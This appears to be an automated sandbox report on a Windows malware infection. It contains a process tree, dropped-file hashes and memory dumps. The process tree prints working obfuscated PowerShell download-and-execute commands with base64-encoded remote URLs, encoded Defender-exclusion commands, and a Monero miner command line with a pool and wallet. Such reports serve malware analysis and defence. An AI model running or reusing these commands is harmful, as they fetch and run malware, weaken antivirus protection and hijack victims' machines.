"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL luhqmxbnvrt $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;luhqmxbnvrt pkzotxjl $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzotxjl;luhqmxbnvrt aiykpt $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs1aQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);aiykpt $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b2a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL qjezygpm $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;qjezygpm tykqrhcaxivo $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tykqrhcaxivo;qjezygpm yqvjfrouc $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);yqvjfrouc $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400

C:\Users\Admin\AppData\Local\Temp\D13A.tmp\patch.exe
patch.exe
3⤵
- Executes dropped EXE
PID:2028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4924 -ip 4924
1⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4924 -ip 4924
1⤵
PID:4628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108

C:\Users\Admin\AppData\Local\Detail\ygzhpwoyo\StringIds.exe
C:\Users\Admin\AppData\Local\Detail\ygzhpwoyo\StringIds.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2816

C:\Users\Admin\AppData\Local\Detail\ygzhpwoyo\StringIds.exe
C:\Users\Admin\AppData\Local\Detail\ygzhpwoyo\StringIds.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3816

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3456

C:\Users\Admin\AppData\Local\Temp\akugwl.exe
C:\Users\Admin\AppData\Local\Temp\akugwl.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4148

C:\Users\Admin\AppData\Local\Temp\akugwl.exe
C:\Users\Admin\AppData\Local\Temp\akugwl.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHMAcwBhAGcAZQBcAFMAdQBwAHAAbwByAHQAcwBEAHkAbgBhAG0AaQBjAFAAYQByAHQAaQB0AGkAbwBuAHMALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AZQBzAHMAYQBnAGUAXABTAHUAcABwAG8AcgB0AHMARAB5AG4AYQBtAGkAYwBQAGEAcgB0AGkAdABpAG8AbgBzAC4AZQB4AGUA
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2964

C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3804

C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2724

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4804

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2544

C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3852

C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
2⤵
- Executes dropped EXE
PID:4244

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Detail\ygzhpwoyo\StringIds.exe
Filesize
885KB

MD5
0ea11d5050bccac4305a57931d723f68

SHA1
bf7bce111d6359ada624a7c781957ba2cb26b66b

SHA256
8f8f2cde6e6757cd7a87a277846e4c62115bd3f0fc6c97fdf63be1bb3c51712b

SHA512
9fac9dd771dec64c724473964e7b480f564ad3ad1393989d65cc4a75bd26208b3b6d7d6ec004f35890ef263dbd215b11f219469b3f34e21b99cb2d158433f2fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\akugwl.exe.log
Filesize
1KB

MD5
b8418ed2a59189acecef48efbc2eba7d

SHA1
14f53c898215122eb28ab41c94697e63a63ff925

SHA256
e17b3fd5b8c8ac454e8fa71e04fd011f27bfab2de07e0319be1d32e916f37a84

SHA512
1ffcaa0e0e5507fdbdb06eb08be210aa3482e587f76be82f2d35ba43a218e3b8c8e8c2aa37ab9d211ebdc7be7896cc53f6064b0694500cb235ef6a720ed9d25d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
9e125123bfeef529d4bbc40045e5abf0

SHA1
d0c65298116989744839c5d82d8d48219d71c4ef

SHA256
e1a570f26d69c6725ba84b617d9c77fcfd81d82d1a90a920215cafde7820443b

SHA512
6e6011330c870de08d0f4a0f20bf215f76e3ba122dd836214f472b8a41d10bb7f7bf48ecc1d0ce7efcb0dd6f74d5b64fec399b39978e1a1e469ab1af5eea1470

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLduscfibj.exe.log
Filesize
1KB

MD5
2cd056bf2cb201147013842c7e70bd08

SHA1
f01f285a3c8121db0bd64d58055838afbd8f44bd

SHA256
c2c2e2f3f8dcf510d1e8e328f3f62ed24f84a8215d70afbb617555ba61e38188

SHA512
2b48b94968755359603c3726c1ae6eefe0b93b6d7ca82db4cc79f991701b82c01de68e6dcb82677e7b79207a907b88c3cc94f9285bebaf87a3d4fdb06eba8b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
1a2e5e35da46d56789cbaea1c8e2d094

SHA1
0be9a7f3614a60cce7ebc4aacfd55d87cf34e0f8

SHA256
0f977384b6ebe2ba0f51ed25b44599ad33bac5dfce64478461f7a8c725bbba0c

SHA512
cf4ea5b403bcc750bcf3d96fe7330d12315ef582521a6e70386156027d0e5761dd6ff15785ae16f28381bdda6719e3cbc99c1427d8d98feee03fd924c464c162

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
60KB

MD5
0a9da256ffcfe42119c7a351e5eaaa9c

SHA1
c992b8e18cfc24faee739511beb5094189806177

SHA256
f4750e5af8c84626318382887c9c17e6555eff006af7d7e88cadd562ab2ee8ed

SHA512
451f4d470fe938a7c71d340f0711a9d1cb98f542138bd95584244471fa5f31beba8274699be1e497742ce91182dc9e308ca2d9ce3d004174a8228cca4c118672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
8c7bcae1075b664d99f011006bff4aad

SHA1
9f9e219cfe7e3002e9f864b08f89d9dbc4a78710

SHA256
28a71a0d3c17042dcc7040bdc1e988b65850a1d68b2bffe398f1b9ff225d6116

SHA512
288ed4019af8b8c7653f95aaf8ef3c0426231d818e5a442e63cee365199b1f020dd7f3e87317d010b55f430adac43736282abc7bf9a279241d66e9bea64e0e44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
363809e82a55a7722d478f95f4b3377b

SHA1
1d8cd0708ae9ec7f331112a6be9d300858b95d32

SHA256
fbac6d9796c295cbb801d69a00a22d504c4531650e5085dcaabe814c752aaa86

SHA512
d41d1c9cbacd0ca8e11038187eb16cf056cdda220179a7c9e5a07b51ebeb277588f58e3f95b1261a58f4f9581c47c75e91961247fc3304f6d5a5f4c58608814b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
10d3fc6b05e41374da4172845882bc65

SHA1
7bee6566d65577fc500945500b8597191d00484f

SHA256
870b1336b2e18be80cc8600521b0495d498997c0295768bcf0ffa5cf208ea624

SHA512
7232efc3565d938a7ec3f809a188c01de6d5eba905c2abde1738f83e1deb7bd41b921a8bd309be80592e9a5a85fd3daf0ce79a7aadb133f3720c405383d3fc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
62567bb2efffc9fccfbd0bf29a11954e

SHA1
0cffb301535f3bdcd4128367ed817d3f5be76646

SHA256
48109d5755486dba57893beb4969cb0722c3e2d5e69186f687b7365cd069cc1c

SHA512
fffdc864ffb52fec7e1322f24870fe28f61c072683ae9076a1e7596f5f1eee88489db30dc18df8585b40f6dff6e9c1efb72e6033e236245d2d004aef3415be00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
fefd718548d96b5b0a1d1630a4b54b6d

SHA1
b4ec76efcb9a86005acd411eb30178bc08c85be4

SHA256
e4f45f6656fe108e142dd89d01e42b018d930875c5e2ed15d5cb255a5b821d97

SHA512
fbeb20e25b98d03409c0a640f850998f70c886cc3bc5ec927223bbd184cf8cfa1fc7315fff85638f41d6f2c03af7ad2cf3d11863d2a640f633d06a82b6c4dc3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
5bc10a54c0c8220f1b9d3b26d57ab0a9

SHA1
6e4e9adad0a0c31b3a94ea8361d152faea9c4dd8

SHA256
83b6e5a93dbf7b7598cd377e27a89f472fe1595bfeb3eafc4984675526fb125f

SHA512
e3688718e439522abc00219dcc5c469d19f39c6b539c2a7ee91988621dd7a74e9420103537621703460fda71597b8c3092e0dbdc61e5ccb2c7e46ad022e1b016

Download Submit
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
Filesize
875KB

MD5
9c98b2c4c9e23bf3f473a9ece5af43aa

SHA1
6cef6639e7494e44bf218f6a7afd9cfc1aec0b56

SHA256
eb1a795b518b23d4c280e7fde93e7ee3b45874995fc77f2a0dcbd2d7f6d24e8d

SHA512
bcbb87e56b7ea3d9dce30358cb8446d2d305c4b1b396870725ab2a1d5e9940e477ac1146c1b72bf5aaa0c6f018b1cdd469dc6b189360d4a63deffb63ba26bbd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
Filesize
43KB

MD5
7c414e585bdc9b6f49efa7c35215e6ee

SHA1
bb00caa0bd15b3888e9d783ace9708fd30690649

SHA256
d64373cdc8f55ca3c99273145a8157ce12e7a3b4ada21686849de49452849e29

SHA512
8adfae7e74c057fe7dab0f58115ae09ebdabeed926eb644035df8f6ac5392d649a31111418eaeb0c0db02108b9076627d9d9f3794e97b1b98a381ffef8d1b259

Download Submit
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
Filesize
663KB

MD5
5012d3b5cf7548a94006eb7788cb41f7

SHA1
f86307deab2928503991e97fe83ea08d81cdad46

SHA256
b91467d78aac9e94d4d87443f2b965ce8d701bab674e8f11a6a716a64f07a2c9

SHA512
636aa617af31a36566ebf85010214f1e112debc68f9cd7e3ab3007b36df00c6d1a99536b3fb92947fa9a249686d3c73acdf1269c38e99aa75463b0902935fa20

Download Submit
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
Filesize
61KB

MD5
9a3a0f32a434f72bdb89e4b234a08d3b

SHA1
9aced20b8e3e56843d19779c38f08b496bc33915

SHA256
8c9e3bf9330cf361b2770feb5cdfd3fea3bb790d87972cc4ae075c3e751c85bf

SHA512
dc957ee0235503bed02fe4eff8fd85f16913b75e0a3d59fb8fa481209ebe7a22e8472066c80491530a85396068ec5821cc5e70b0a9b490db21a66d26a4121ffb

Download Submit
C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b1.hta
Filesize
4KB

MD5
e66d251ec771c96871b379e9190ff7a1

SHA1
37f14cd2f77b3f1877e266dc1f7e8df882119912

SHA256
2778e5c8e94981206b305108d42ac9c9d7be5f36eaf94cab2483120e9d3d3696

SHA512
4a8c886a828f61b031e9169886711da85d411535e2b6b1062614cd3fee4947fe340a60125dd0f30523a359ca677debbeba15ed55497e2bbe24787dfa5309ce88

Download Submit
C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b1a.hta
Filesize
4KB

MD5
5fc9f573414f4bdf535974dcc5812b87

SHA1
028b64ccbb98e650ee4909de019b0ff2da4cd138

SHA256
3b282cd60bc0c9689b4a68d2013f986e3534190042c8359be580db7004803118

SHA512
dfaaa82faa1ea65ed4da21bcebf7ca9821feef63b6ebb6b5d9ad40dd839520e2dffd4ed90fa10e2dbe670f377e6ad5bd59f4fcf115e29e693493325558ce253c

Download Submit
C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b2.hta
Filesize
4KB

MD5
68950206a64bdad979c35f5e4a67e8be

SHA1
d2789c3e940275ba2c30a6b5eb8c91da5751f1f9

SHA256
4864a18f70757f92fcf8631c918687e528768165dff70b8f5ebacd29a256e6bf

SHA512
8ca1391b917ff14b3c3b4f3145d9248b0ca154033646b9efbf3121d1a150ccfe5fad005a20f61b19ca95486e9d00caef9c12b98f5dba65a3a9ed84a6394c1d57

Download Submit
C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b2a.hta
Filesize
4KB

MD5
aad742136ab66a8cedceeb0d5175c249

SHA1
98103efcf3c76f5b5ba4ad208702ac49e8da1f4f

SHA256
63f208e5dc8a4bf02bb5ed4e65a8e187bfbbe43856d6546fdb49efa555b46af6

SHA512
23e0c5c6bb379610fe37ef64f5b3e49152c6d221229a6f4dc448d6076506f9c4b72e36691fa12d761c6fc32d96cba810e6ad6406d8ef6f29bd294cb951867093

Download Submit
C:\Users\Admin\AppData\Local\Temp\D13A.tmp\m1.hta
Filesize
4KB

MD5
a75bddf46ecdadb3cbf1ff26a9c52c9e

SHA1
1c58d74bba1df1293494e248abd35d38153696df

SHA256
fc97cfcd0a76d1e8fbffb3c2ae137bdd08f5e05114c20c8049cc52d08421b287

SHA512
054464f5a10a4694ccfe3ec760e38afee83873d8b1d40b58bd1193a0f609ae57c0e7725c5a139dbdd61e8cd5b69f9ad1d1448aee03c594ee7d948a0fc8b4b5e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\D13A.tmp\m1a.hta
Filesize
4KB

MD5
f4db89dbe45cd8e7fb12009af13a9608

SHA1
b8682e5b10d93b32e01858355e50fd2c7daafde3

SHA256
48a17e20a2f884bf3d97e30a43bc7af1141832f28fc4feeb33ade73e4c9487aa

SHA512
b5df1b079ad5fda423a0bdd62bf2c0fb3c825ec3a237f36eef40bc4a572cf30bef2b434d448c93c52bfc1cbed3b1bc9b93b10ffe124f7cbd3f66f5aaa894b182

Download Submit
C:\Users\Admin\AppData\Local\Temp\D13A.tmp\patch.exe
Filesize
336KB

MD5
9fbcde2bef57f19074b0e38dc594e7bc

SHA1
85e585d60b95586722d17456c1456093320f432d

SHA256
e737c058e7550314c1d9091f6772e401c58c0fae877256cdb984397652ba4da1

SHA512
0d7f81cb3787a2f9847e4277ccbeb9afb18b85a68c549c14ed2b745e2a491ad8ba286e194e417d147b008a9a4ea4af778d65e21543cde023a2332182e143aafe

Download Submit
C:\Users\Admin\AppData\Local\Temp\D13A.tmp\start.bat
Filesize
144B

MD5
000bc3c04e398b14a323c24070243498

SHA1
e7e69d5f911344de293fe571dbe918f7774da134

SHA256
4a38cfb83a3669790b29b336bf1aeabd5f45a1ea055c68e2ea69077b71ead30f

SHA512
9b1ac0441f157179e0ee31c2660b5213e299ceada17888168cd597593fc8e02483ea40e7173eb768c9dc3b051945a251d5d8ca6102321987e9268bcd61f9c68b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ujlrv0rb.r2n.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\akugwl.exe
Filesize
919KB

MD5
710180c340bdaf4a9e3543ba376ddec1

SHA1
a26b3744cf6d7c6157d8d699029b605a8b8e9849

SHA256
3e9e65b139afe73c38d31ad771845526b70595725209787ce631539c776c7ee9

SHA512
4f9703831776cba2e6a27ee90ba43fd3184871817be96cf9f2e6e07d35cc14c4e9198085ba9d6b90ad2e39c3ecb3b203c512d7334e7767cee72a13a74a8fdf45

Download Submit
C:\Users\Public\icw.exe
Filesize
878KB

MD5
856ae2a137d2d09cd9a81697bdcf5a6e

SHA1
fe5cb985aebb7856909aa36384b0bb63ddeaa0fd

SHA256
f774849beb73f56018239c4bc9eecc65f4d981fda924c48812716a8d3340346c

SHA512
2ed50d09bdb7ff8762586f3af6f4ae4bbc1903b05a8d344eade2317c6662467179c6a490ef26a09ec8f7d43721aab6be58445102feee3172d3c7dbd24072abc8

Download Submit
C:\Users\Public\icw.exe
Filesize
521KB

MD5
93c62f1b7b1a47128dafafbe4a714960

SHA1
bcebb93605af91429e766f094eea562f077509e7

SHA256
0ed9cc842f211fd6cfeaf2a802c1ce13ab3034e4e87892c1445736e5e3945cb0

SHA512
685471f6838df9220f70c7b225a6224352624ce58813dc6ea8640060389d6cb0540f765a971b63569591f9410fb80a7cdc831514fd0ca57bbccb4fd4dab33331

Download Submit
C:\Users\Public\icw.exe
Filesize
639KB

MD5
d85e129afb3dd2eb2db19f379084cb69

SHA1
aec62471f97f0b0b277a84e14f1f87e973c91818

SHA256
183cef5137dbcf61993861200f36973718e2a99e630f82a3b29471541756196b

SHA512
de03269ee1ed8a969e88674f7fee0508c6d1f47ec4adcbec9de2bf906f03ad862f379176ad40fbb258b67290a8adf901100d3324c8c716d412006b562d61ec12

Download Submit
C:\Users\Public\icw.exe
Filesize
367KB

MD5
3c69a247c434a60857b970bcc775c719

SHA1
b861cd4e71b0eeaf60a39d85b57e2dc1e8c6c1f7

SHA256
494510e4bf13f7d7d938fecb678951efef2ff5bb6cea1dedaa61f636f2210260

SHA512
b5e64e0c5c0708a4d55e725e939e464f16756cb053d15914c374f56168ef30dd31b721f89f6760879f9cd715c5fc48402e7e4bdbc373190333fe68f7964e1f28

Download Submit
memory/244-228-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-198-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-224-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-222-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-214-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-220-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-218-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-216-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-212-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-210-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-208-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-206-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-204-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-202-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-200-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-226-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-196-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-194-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-232-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-238-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-190-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-188-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-244-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-246-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-248-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-242-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-183-0x0000000000400000-0x000000000049A000-memory.dmp

Filesize
616KB

Download
memory/244-240-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-236-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/244-234-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
